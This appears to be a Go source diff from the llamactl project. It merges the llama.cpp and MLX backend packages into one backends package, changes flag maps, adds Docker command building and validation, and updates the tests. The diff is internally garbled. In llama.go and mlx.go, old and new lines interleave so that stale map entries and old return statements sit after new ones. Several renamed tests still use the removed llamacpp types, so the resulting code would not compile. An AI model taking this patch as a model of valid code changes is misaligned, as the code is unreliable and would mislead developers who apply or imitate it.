 	if backend.Docker != nil && backend.Docker.Enabled && o.BackendType != BackendTypeMlxLm {
 		return true
 	}
 	return false
 }
 func (o *Options) IsDockerEnabled(backendConfig *config.BackendConfig) bool {
 	backendSettings := o.getBackendSettings(backendConfig)
 	return o.isDockerEnabled(backendSettings)
 }
 // GetCommand builds the command to run the backend
 func (o *Options) GetCommand(backendConfig *config.BackendConfig) string {
 	backendSettings := o.getBackendSettings(backendConfig)
 	if o.isDockerEnabled(backendSettings) {
 		return "docker"
 	}
 	return backendSettings.Command
 }
 // buildCommandArgs builds command line arguments for the backend
 func (o *Options) BuildCommandArgs(backendConfig *config.BackendConfig) []string {
 	var args []string
 	backendSettings := o.getBackendSettings(backendConfig)
 	backend := o.getBackend()
 	if backend == nil {
 		return args
 	}
 	if o.isDockerEnabled(backendSettings) {
 		// For Docker, start with Docker args
 		args = append(args, backendSettings.Docker.Args...)
 		args = append(args, backendSettings.Docker.Image)
 		args = append(args, backend.BuildDockerArgs()...)
 	} else {
 		// For native execution, start with backend args
 		args = append(args, backendSettings.Args...)
 		args = append(args, backend.BuildCommandArgs()...)
 	}
 	return args
 }
 // BuildEnvironment builds the environment variables for the backend process
 func (o *Options) BuildEnvironment(backendConfig *config.BackendConfig, environment map[string]string) map[string]string {
 	backendSettings := o.getBackendSettings(backendConfig)
 	env := map[string]string{}
 	if backendSettings.Environment != nil {
 		maps.Copy(env, backendSettings.Environment)
 	}
 	if o.isDockerEnabled(backendSettings) {
 		if backendSettings.Docker.Environment != nil {
 			maps.Copy(env, backendSettings.Docker.Environment)
 		}
 	}
 	if environment != nil {
 		maps.Copy(env, environment)
 	}
 	return env
 }
 func (o *Options) GetPort() int {
 	backend := o.getBackend()
 	if backend != nil {
 		return backend.GetPort()
 	}
 	return 0
 }
 func (o *Options) SetPort(port int) {
 	backend := o.getBackend()
 	if backend != nil {
 		backend.SetPort(port)
 	}
 }
 func (o *Options) GetHost() string {
 	backend := o.getBackend()
 	if backend != nil {
 		return backend.GetHost()
 	}
 	return "localhost"
 }
 func (o *Options) GetResponseHeaders(backendConfig *config.BackendConfig) map[string]string {
 	backendSettings := o.getBackendSettings(backendConfig)
 	return backendSettings.ResponseHeaders
 }
 // ValidateInstanceOptions performs validation based on backend type
 func (o *Options) ValidateInstanceOptions() error {
 	backend := o.getBackend()
 	if backend == nil {
 		return validation.ValidationError(fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType))
 	}
 	return backend.Validate()
 }
--- a/pkg/backends/builder.go
+++ b/pkg/backends/builder.go
@@ -1,13 +1,15 @@
 package backends
 import (
 	"fmt"
 	"llamactl/pkg/config"
 	"reflect"
 	"strconv"
 	"strings"
 )
 // BuildCommandArgs converts a struct to command line arguments
-func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
+func BuildCommandArgs(options any, multipleFlags map[string]struct{}) []string {
 	var args []string
 	v := reflect.ValueOf(options).Elem()
@@ -26,9 +28,10 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
 			continue
 		}
-		// Get flag name from JSON tag
+		// Get flag name from JSON tag (snake_case)
-		flagName := strings.Split(jsonTag, ",")[0]
+		jsonFieldName := strings.Split(jsonTag, ",")[0]
-		flagName = strings.ReplaceAll(flagName, "_", "-")
+		// Convert to kebab-case for CLI flags
 		flagName := strings.ReplaceAll(jsonFieldName, "_", "-")
 		switch field.Kind() {
 		case reflect.Bool:
@@ -49,7 +52,8 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
 			}
 		case reflect.Slice:
 			if field.Type().Elem().Kind() == reflect.String && field.Len() > 0 {
-				if multipleFlags[flagName] {
+				// Use jsonFieldName (snake_case) for multipleFlags lookup
 				if _, isMultiValue := multipleFlags[jsonFieldName]; isMultiValue {
 					// Multiple flags: --flag value1 --flag value2
 					for j := 0; j < field.Len(); j++ {
 						args = append(args, "--"+flagName, field.Index(j).String())
@@ -68,3 +72,24 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
 	return args
 }
 // BuildDockerCommand builds a Docker command with the specified configuration and arguments
 func BuildDockerCommand(backendConfig *config.BackendSettings, instanceArgs []string) (string, []string, error) {
 	// Start with configured Docker arguments (should include "run", "--rm", etc.)
 	dockerArgs := make([]string, len(backendConfig.Docker.Args))
 	copy(dockerArgs, backendConfig.Docker.Args)
 	// Add environment variables
 	for key, value := range backendConfig.Docker.Environment {
 		dockerArgs = append(dockerArgs, "-e", fmt.Sprintf("%s=%s", key, value))
 	}
 	// Add image name
 	dockerArgs = append(dockerArgs, backendConfig.Docker.Image)
 	// Add backend args and instance args
 	dockerArgs = append(dockerArgs, backendConfig.Args...)
 	dockerArgs = append(dockerArgs, instanceArgs...)
 	return "docker", dockerArgs, nil
 }
--- a/pkg/backends/llamacpp/llama.go
+++ b/pkg/backends/llamacpp/llama.go
@@ -1,12 +1,26 @@
-package llamacpp
+package backends
 import (
 	"encoding/json"
-	"llamactl/pkg/backends"
+	"fmt"
 	"llamactl/pkg/validation"
 	"reflect"
 	"strconv"
 )
 // llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
 // Keys use snake_case as the parser converts kebab-case flags to snake_case before lookup
 var llamaMultiValuedFlags = map[string]struct{}{
 	"override_tensor":       {},
 	"override_kv":           {},
 	"lora":                  {},
 	"lora_scaled":           {},
 	"control_vector":        {},
 	"control_vector_scaled": {},
 	"dry_sequence_breaker":  {},
 	"logit_bias":            {},
 }
 type LlamaServerOptions struct {
 	// Common params
 	VerbosePrompt           bool     `json:"verbose_prompt,omitempty"`
@@ -313,44 +327,61 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
 	return nil
 }
 func (o *LlamaServerOptions) GetPort() int {
 	return o.Port
 }
 func (o *LlamaServerOptions) SetPort(port int) {
 	o.Port = port
 }
 func (o *LlamaServerOptions) GetHost() string {
 	return o.Host
 }
 func (o *LlamaServerOptions) Validate() error {
 	if o == nil {
 		return validation.ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
 	}
 	// Use reflection to check all string fields for injection patterns
 	if err := validation.ValidateStructStrings(o, ""); err != nil {
 		return err
 	}
 	// Basic network validation for port
 	if o.Port < 0 || o.Port > 65535 {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
 	}
 	return nil
 }
 // BuildCommandArgs converts InstanceOptions to command line arguments
 func (o *LlamaServerOptions) BuildCommandArgs() []string {
 	// Llama uses multiple flags for arrays by default (not comma-separated)
-	multipleFlags := map[string]bool{
+	// Use package-level llamaMultiValuedFlags variable
-		"override-tensor":       true,
+	return BuildCommandArgs(o, llamaMultiValuedFlags)
 		"override-kv":           true,
 		"lora":                  true,
 		"lora-scaled":           true,
 		"control-vector":        true,
 		"control-vector-scaled": true,
 		"dry-sequence-breaker":  true,
 		"logit-bias":            true,
 	}
 	return backends.BuildCommandArgs(o, multipleFlags)
 }
-// ParseLlamaCommand parses a llama-server command string into LlamaServerOptions
+func (o *LlamaServerOptions) BuildDockerArgs() []string {
 	// For llama, Docker args are the same as normal args
 	return o.BuildCommandArgs()
 }
 // ParseCommand parses a llama-server command string into LlamaServerOptions
 // Supports multiple formats:
 // 1. Full command: "llama-server --model file.gguf"
 // 2. Full path: "/usr/local/bin/llama-server --model file.gguf"
 // 3. Args only: "--model file.gguf --gpu-layers 32"
 // 4. Multiline commands with backslashes
-func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
+func (o *LlamaServerOptions) ParseCommand(command string) (any, error) {
 	executableNames := []string{"llama-server"}
 	var subcommandNames []string // Llama has no subcommands
-	multiValuedFlags := map[string]bool{
+	// Use package-level llamaMultiValuedFlags variable
 		"override_tensor":       true,
 		"override_kv":           true,
 		"lora":                  true,
 		"lora_scaled":           true,
 		"control_vector":        true,
 		"control_vector_scaled": true,
 		"dry_sequence_breaker":  true,
 		"logit_bias":            true,
 	}
 	var llamaOptions LlamaServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
+	if err := parseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil {
 		return nil, err
 	}
--- a/pkg/backends/llamacpp/llama_test.go
+++ b/pkg/backends/llamacpp/llama_test.go
@@ -1,71 +1,38 @@
-package llamacpp_test
+package backends_test
 import (
 	"encoding/json"
 	"fmt"
-	"llamactl/pkg/backends/llamacpp"
+	"llamactl/pkg/backends"
 	"llamactl/pkg/testutil"
 	"reflect"
 	"slices"
 	"testing"
 )
-func TestBuildCommandArgs_BasicFields(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) {
 	options := llamacpp.LlamaServerOptions{
 		Model:     "/path/to/model.gguf",
 		Port:      8080,
 		Host:      "localhost",
 		Verbose:   true,
 		CtxSize:   4096,
 		GPULayers: 32,
 	}
 	args := options.BuildCommandArgs()
 	// Check individual arguments
 	expectedPairs := map[string]string{
 		"--model":      "/path/to/model.gguf",
 		"--port":       "8080",
 		"--host":       "localhost",
 		"--ctx-size":   "4096",
 		"--gpu-layers": "32",
 	}
 	for flag, expectedValue := range expectedPairs {
 		if !containsFlagWithValue(args, flag, expectedValue) {
 			t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
 		}
 	}
 	// Check standalone boolean flag
 	if !contains(args, "--verbose") {
 		t.Errorf("Expected --verbose flag not found in %v", args)
 	}
 }
 func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 	tests := []struct {
 		name     string
-		options  llamacpp.LlamaServerOptions
+		options  backends.LlamaServerOptions
 		expected []string
 		excluded []string
 	}{
 		{
 			name: "verbose true",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose: true,
 			},
 			expected: []string{"--verbose"},
 		},
 		{
 			name: "verbose false",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose: false,
 			},
 			excluded: []string{"--verbose"},
 		},
 		{
 			name: "multiple booleans",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose:   true,
 				FlashAttn: true,
 				Mlock:     false,
@@ -81,13 +48,13 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 			args := tt.options.BuildCommandArgs()
 			for _, expectedArg := range tt.expected {
-				if !contains(args, expectedArg) {
+				if !testutil.Contains(args, expectedArg) {
 					t.Errorf("Expected argument %q not found in %v", expectedArg, args)
 				}
 			}
 			for _, excludedArg := range tt.excluded {
-				if contains(args, excludedArg) {
+				if testutil.Contains(args, excludedArg) {
 					t.Errorf("Excluded argument %q found in %v", excludedArg, args)
 				}
 			}
@@ -95,38 +62,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 	}
 }
-func TestBuildCommandArgs_NumericFields(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+	options := backends.LlamaServerOptions{
 		Port:        8080,
 		Threads:     4,
 		CtxSize:     2048,
 		GPULayers:   16,
 		Temperature: 0.7,
 		TopK:        40,
 		TopP:        0.9,
 	}
 	args := options.BuildCommandArgs()
 	expectedPairs := map[string]string{
 		"--port":       "8080",
 		"--threads":    "4",
 		"--ctx-size":   "2048",
 		"--gpu-layers": "16",
 		"--temp":       "0.7",
 		"--top-k":      "40",
 		"--top-p":      "0.9",
 	}
 	for flag, expectedValue := range expectedPairs {
 		if !containsFlagWithValue(args, flag, expectedValue) {
 			t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
 		}
 	}
 }
 func TestBuildCommandArgs_ZeroValues(t *testing.T) {
 	options := llamacpp.LlamaServerOptions{
 		Port:        0,     // Should be excluded
 		Threads:     0,     // Should be excluded
 		Temperature: 0,     // Should be excluded
@@ -146,14 +83,14 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
 	}
 	for _, excludedArg := range excludedArgs {
-		if contains(args, excludedArg) {
+		if testutil.Contains(args, excludedArg) {
 			t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
 		}
 	}
 }
-func TestBuildCommandArgs_ArrayFields(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+	options := backends.LlamaServerOptions{
 		Lora:               []string{"adapter1.bin", "adapter2.bin"},
 		OverrideTensor:     []string{"tensor1", "tensor2", "tensor3"},
 		DrySequenceBreaker: []string{".", "!", "?"},
@@ -170,15 +107,15 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
 	for flag, values := range expectedOccurrences {
 		for _, value := range values {
-			if !containsFlagWithValue(args, flag, value) {
+			if !testutil.ContainsFlagWithValue(args, flag, value) {
 				t.Errorf("Expected %s %s, not found in %v", flag, value, args)
 			}
 		}
 	}
 }
-func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+	options := backends.LlamaServerOptions{
 		Lora:           []string{}, // Empty array should not generate args
 		OverrideTensor: []string{}, // Empty array should not generate args
 	}
@@ -187,43 +124,13 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
 	excludedArgs := []string{"--lora", "--override-tensor"}
 	for _, excludedArg := range excludedArgs {
-		if contains(args, excludedArg) {
+		if testutil.Contains(args, excludedArg) {
 			t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
 		}
 	}
 }
-func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) {
 	// Test snake_case to kebab-case conversion
 	options := llamacpp.LlamaServerOptions{
 		CtxSize:      4096,
 		GPULayers:    32,
 		ThreadsBatch: 2,
 		FlashAttn:    true,
 		TopK:         40,
 		TopP:         0.9,
 	}
 	args := options.BuildCommandArgs()
 	// Check that field names are properly converted
 	expectedFlags := []string{
 		"--ctx-size",      // ctx_size -> ctx-size
 		"--gpu-layers",    // gpu_layers -> gpu-layers
 		"--threads-batch", // threads_batch -> threads-batch
 		"--flash-attn",    // flash_attn -> flash-attn
 		"--top-k",         // top_k -> top-k
 		"--top-p",         // top_p -> top-p
 	}
 	for _, flag := range expectedFlags {
 		if !contains(args, flag) {
 			t.Errorf("Expected flag %q not found in %v", flag, args)
 		}
 	}
 }
 func TestUnmarshalJSON_StandardFields(t *testing.T) {
 	jsonData := `{
 		"model": "/path/to/model.gguf",
 		"port": 8080,
@@ -234,7 +141,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 		"temp": 0.7
 	}`
-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -263,16 +170,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 	}
 }
-func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	tests := []struct {
 		name     string
 		jsonData string
-		checkFn  func(llamacpp.LlamaServerOptions) error
+		checkFn  func(backends.LlamaServerOptions) error
 	}{
 		{
 			name:     "threads alternatives",
 			jsonData: `{"t": 4, "tb": 2}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Threads != 4 {
 					return fmt.Errorf("expected threads 4, got %d", opts.Threads)
 				}
@@ -285,7 +192,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "context size alternatives",
 			jsonData: `{"c": 2048}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.CtxSize != 2048 {
 					return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
 				}
@@ -295,7 +202,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "gpu layers alternatives",
 			jsonData: `{"ngl": 16}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.GPULayers != 16 {
 					return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
 				}
@@ -305,7 +212,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "model alternatives",
 			jsonData: `{"m": "/path/model.gguf"}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Model != "/path/model.gguf" {
 					return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
 				}
@@ -315,7 +222,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "temperature alternatives",
 			jsonData: `{"temp": 0.8}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Temperature != 0.8 {
 					return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
 				}
@@ -326,7 +233,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			var options llamacpp.LlamaServerOptions
+			var options backends.LlamaServerOptions
 			err := json.Unmarshal([]byte(tt.jsonData), &options)
 			if err != nil {
 				t.Fatalf("Unmarshal failed: %v", err)
@@ -339,24 +246,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	}
 }
-func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
 	invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(invalidJSON), &options)
 	if err == nil {
 		t.Error("Expected error for invalid JSON")
 	}
 }
-func TestUnmarshalJSON_ArrayFields(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
 	jsonData := `{
 		"lora": ["adapter1.bin", "adapter2.bin"],
 		"override_tensor": ["tensor1", "tensor2"],
 		"dry_sequence_breaker": [".", "!", "?"]
 	}`
-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -383,26 +290,81 @@ func TestParseLlamaCommand(t *testing.T) {
 		name      string
 		command   string
 		expectErr bool
 		validate  func(*testing.T, *backends.LlamaServerOptions)
 	}{
 		{
 			name:      "basic command",
 			command:   "llama-server --model /path/to/model.gguf --gpu-layers 32",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.Model != "/path/to/model.gguf" {
 					t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
 				}
 				if opts.GPULayers != 32 {
 					t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
 				}
 			},
 		},
 		{
 			name:      "args only",
 			command:   "--model /path/to/model.gguf --ctx-size 4096",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.Model != "/path/to/model.gguf" {
 					t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
 				}
 				if opts.CtxSize != 4096 {
 					t.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
 				}
 			},
 		},
 		{
 			name:      "mixed flag formats",
 			command:   "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.Model != "/path/model.gguf" {
 					t.Errorf("expected model '/path/model.gguf', got '%s'", opts.Model)
 				}
 				if opts.GPULayers != 16 {
 					t.Errorf("expected gpu_layers 16, got %d", opts.GPULayers)
 				}
 				if !opts.Verbose {
 					t.Errorf("expected verbose to be true")
 				}
 			},
 		},
 		{
 			name:      "quoted strings",
 			command:   `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.APIKey != "sk-1234567890abcdef" {
 					t.Errorf("expected api_key 'sk-1234567890abcdef', got '%s'", opts.APIKey)
 				}
 			},
 		},
 		{
 			name:      "multiple value types",
 			command:   "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.Model != "/test/model.gguf" {
 					t.Errorf("expected model '/test/model.gguf', got '%s'", opts.Model)
 				}
 				if opts.GPULayers != 32 {
 					t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
 				}
 				if opts.Temperature != 0.7 {
 					t.Errorf("expected temperature 0.7, got %f", opts.Temperature)
 				}
 				if !opts.Verbose {
 					t.Errorf("expected verbose to be true")
 				}
 				if !opts.NoMmap {
 					t.Errorf("expected no_mmap to be true")
 				}
 			},
 		},
 		{
 			name:      "empty command",
@@ -423,7 +385,9 @@ func TestParseLlamaCommand(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result, err := llamacpp.ParseLlamaCommand(tt.command)
+			var opts backends.LlamaServerOptions
 			resultAny, err := opts.ParseCommand(tt.command)
 			result, _ := resultAny.(*backends.LlamaServerOptions)
 			if tt.expectErr {
 				if err == nil {
@@ -439,43 +403,21 @@ func TestParseLlamaCommand(t *testing.T) {
 			if result == nil {
 				t.Errorf("expected result but got nil")
 				return
 			}
 			if tt.validate != nil {
 				tt.validate(t, result)
 			}
 		})
 	}
 }
 func TestParseLlamaCommandValues(t *testing.T) {
 	command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
 	result, err := llamacpp.ParseLlamaCommand(command)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	if result.Model != "/test/model.gguf" {
 		t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model)
 	}
 	if result.GPULayers != 32 {
 		t.Errorf("expected gpu_layers 32, got %d", result.GPULayers)
 	}
 	if result.Temperature != 0.7 {
 		t.Errorf("expected temperature 0.7, got %f", result.Temperature)
 	}
 	if !result.Verbose {
 		t.Errorf("expected verbose to be true")
 	}
 	if !result.NoMmap {
 		t.Errorf("expected no_mmap to be true")
 	}
 }
 func TestParseLlamaCommandArrays(t *testing.T) {
 	command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
-	result, err := llamacpp.ParseLlamaCommand(command)
+	var opts backends.LlamaServerOptions
 	resultAny, err := opts.ParseCommand(command)
 	result, _ := resultAny.(*backends.LlamaServerOptions)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
@@ -492,20 +434,3 @@ func TestParseLlamaCommandArrays(t *testing.T) {
 		}
 	}
 }
 // Helper functions
 func contains(slice []string, item string) bool {
 	return slices.Contains(slice, item)
 }
 func containsFlagWithValue(args []string, flag, value string) bool {
 	for i, arg := range args {
 		if arg == flag {
 			// Check if there's a next argument and it matches the expected value
 			if i+1 < len(args) && args[i+1] == value {
 				return true
 			}
 		}
 	}
 	return false
 }
--- a/pkg/backends/mlx/mlx.go
+++ b/pkg/backends/mlx/mlx.go
@@ -1,7 +1,8 @@
-package mlx
+package backends
 import (
-	"llamactl/pkg/backends"
+	"fmt"
 	"llamactl/pkg/validation"
 )
 type MlxServerOptions struct {
@@ -30,25 +31,58 @@ type MlxServerOptions struct {
 	MaxTokens int     `json:"max_tokens,omitempty"`
 }
-// BuildCommandArgs converts to command line arguments
+func (o *MlxServerOptions) GetPort() int {
-func (o *MlxServerOptions) BuildCommandArgs() []string {
+	return o.Port
 	multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
 	return backends.BuildCommandArgs(o, multipleFlags)
 }
-// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
+func (o *MlxServerOptions) SetPort(port int) {
 	o.Port = port
 }
 func (o *MlxServerOptions) GetHost() string {
 	return o.Host
 }
 func (o *MlxServerOptions) Validate() error {
 	if o == nil {
 		return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
 	}
 	if err := validation.ValidateStructStrings(o, ""); err != nil {
 		return err
 	}
 	// Basic network validation for port
 	if o.Port < 0 || o.Port > 65535 {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
 	}
 	return nil
 }
 // BuildCommandArgs converts to command line arguments
 func (o *MlxServerOptions) BuildCommandArgs() []string {
 	multipleFlags := map[string]struct{}{} // MLX doesn't currently have []string fields
 	return BuildCommandArgs(o, multipleFlags)
 }
 func (o *MlxServerOptions) BuildDockerArgs() []string {
 	return []string{}
 }
 // ParseCommand parses a mlx_lm.server command string into MlxServerOptions
 // Supports multiple formats:
 // 1. Full command: "mlx_lm.server --model model/path"
 // 2. Full path: "/usr/local/bin/mlx_lm.server --model model/path"
 // 3. Args only: "--model model/path --host 0.0.0.0"
 // 4. Multiline commands with backslashes
-func ParseMlxCommand(command string) (*MlxServerOptions, error) {
+func (o *MlxServerOptions) ParseCommand(command string) (any, error) {
 	executableNames := []string{"mlx_lm.server"}
-	var subcommandNames []string          // MLX has no subcommands
+	var subcommandNames []string            // MLX has no subcommands
-	multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
+	multiValuedFlags := map[string]struct{}{} // MLX has no multi-valued flags
 	var mlxOptions MlxServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
+	if err := parseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
 		return nil, err
 	}
--- a/pkg/backends/mlx/mlx_test.go
+++ b/pkg/backends/mlx/mlx_test.go
@@ -1,157 +0,0 @@
 package mlx_test
 import (
 	"llamactl/pkg/backends/mlx"
 	"testing"
 )
 func TestParseMlxCommand(t *testing.T) {
 	tests := []struct {
 		name      string
 		command   string
 		expectErr bool
 	}{
 		{
 			name:      "basic command",
 			command:   "mlx_lm.server --model /path/to/model --host 0.0.0.0",
 			expectErr: false,
 		},
 		{
 			name:      "args only",
 			command:   "--model /path/to/model --port 8080",
 			expectErr: false,
 		},
 		{
 			name:      "mixed flag formats",
 			command:   "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
 			expectErr: false,
 		},
 		{
 			name:      "quoted strings",
 			command:   `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
 			expectErr: false,
 		},
 		{
 			name:      "empty command",
 			command:   "",
 			expectErr: true,
 		},
 		{
 			name:      "unterminated quote",
 			command:   `mlx_lm.server --model test.mlx --chat-template "unterminated`,
 			expectErr: true,
 		},
 		{
 			name:      "malformed flag",
 			command:   "mlx_lm.server ---model test.mlx",
 			expectErr: true,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			result, err := mlx.ParseMlxCommand(tt.command)
 			if tt.expectErr {
 				if err == nil {
 					t.Errorf("expected error but got none")
 				}
 				return
 			}
 			if err != nil {
 				t.Errorf("unexpected error: %v", err)
 				return
 			}
 			if result == nil {
 				t.Errorf("expected result but got nil")
 			}
 		})
 	}
 }
 func TestParseMlxCommandValues(t *testing.T) {
 	command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
 	result, err := mlx.ParseMlxCommand(command)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	if result.Model != "/test/model.mlx" {
 		t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
 	}
 	if result.Port != 8080 {
 		t.Errorf("expected port 8080, got %d", result.Port)
 	}
 	if result.Temp != 0.7 {
 		t.Errorf("expected temp 0.7, got %f", result.Temp)
 	}
 	if !result.TrustRemoteCode {
 		t.Errorf("expected trust_remote_code to be true")
 	}
 	if result.LogLevel != "DEBUG" {
 		t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
 	}
 }
 func TestBuildCommandArgs(t *testing.T) {
 	options := &mlx.MlxServerOptions{
 		Model:           "/test/model.mlx",
 		Host:            "127.0.0.1",
 		Port:            8080,
 		Temp:            0.7,
 		TopP:            0.9,
 		TopK:            40,
 		MaxTokens:       2048,
 		TrustRemoteCode: true,
 		LogLevel:        "DEBUG",
 		ChatTemplate:    "custom template",
 	}
 	args := options.BuildCommandArgs()
 	// Check that all expected flags are present
 	expectedFlags := map[string]string{
 		"--model":         "/test/model.mlx",
 		"--host":          "127.0.0.1",
 		"--port":          "8080",
 		"--log-level":     "DEBUG",
 		"--chat-template": "custom template",
 		"--temp":          "0.7",
 		"--top-p":         "0.9",
 		"--top-k":         "40",
 		"--max-tokens":    "2048",
 	}
 	for i := 0; i < len(args); i++ {
 		if args[i] == "--trust-remote-code" {
 			continue // Boolean flag with no value
 		}
 		if args[i] == "--use-default-chat-template" {
 			continue // Boolean flag with no value
 		}
 		if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
 			if args[i+1] != expectedValue {
 				t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
 			}
 		}
 	}
 	// Check boolean flags
 	foundTrustRemoteCode := false
 	for _, arg := range args {
 		if arg == "--trust-remote-code" {
 			foundTrustRemoteCode = true
 		}
 	}
 	if !foundTrustRemoteCode {
 		t.Errorf("expected --trust-remote-code flag to be present")
 	}
 }
--- a/pkg/backends/mlx_test.go
+++ b/pkg/backends/mlx_test.go
@@ -0,0 +1,204 @@
 package backends_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/testutil"
 	"testing"
 )
